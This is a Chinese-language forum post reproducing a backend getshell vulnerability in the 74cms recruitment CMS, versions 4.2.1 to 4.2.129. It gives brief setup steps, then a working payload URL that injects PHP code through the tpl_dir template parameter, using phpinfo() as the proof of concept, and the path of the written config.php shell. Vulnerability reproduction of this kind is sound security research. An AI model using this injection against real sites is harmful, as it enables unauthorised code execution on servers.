74cms v4.2.1-v4.2.129-后台getshell漏洞复现-Kali笔记

小黄人 发表于 2021-1-5 16:25:14

74cms v4.2.1-v4.2.129-后台getshell漏洞复现

本帖最后由小黄人于 2021-1-5 16:29 编辑

### 环境搭建

1. 先去官网获取骑士人才系统基础版(安装包)

2.将获取好的包进行安装

![](data/attachment/forum/202101/05/162632dg0506y6d6bqf6zy.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "20200628174551873.png")
### 漏洞复现
**点加工具，点击风格模板**
![](data/attachment/forum/202101/05/162722qbe9n2v0ovbv8dyo.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "20200628174634462.png")

**Payload：**
```
http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'
```
**shell地址：**
```
http://127.0.0.1/74cms/Application/Home/Conf/config.php
```
![](data/attachment/forum/202101/05/162855h5255pukpvwnivix.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "aHR0cHM6Ly9ibG9nLnFpYW54aWFvOTk2LmNuLy8vd3AtY29udGVudC91cGxvYWRzLzIwMTkvMTIvMDkv.png")

页: [1]

Kali笔记's Archiver

74cms v4.2.1-v4.2.129-后台getshell漏洞复现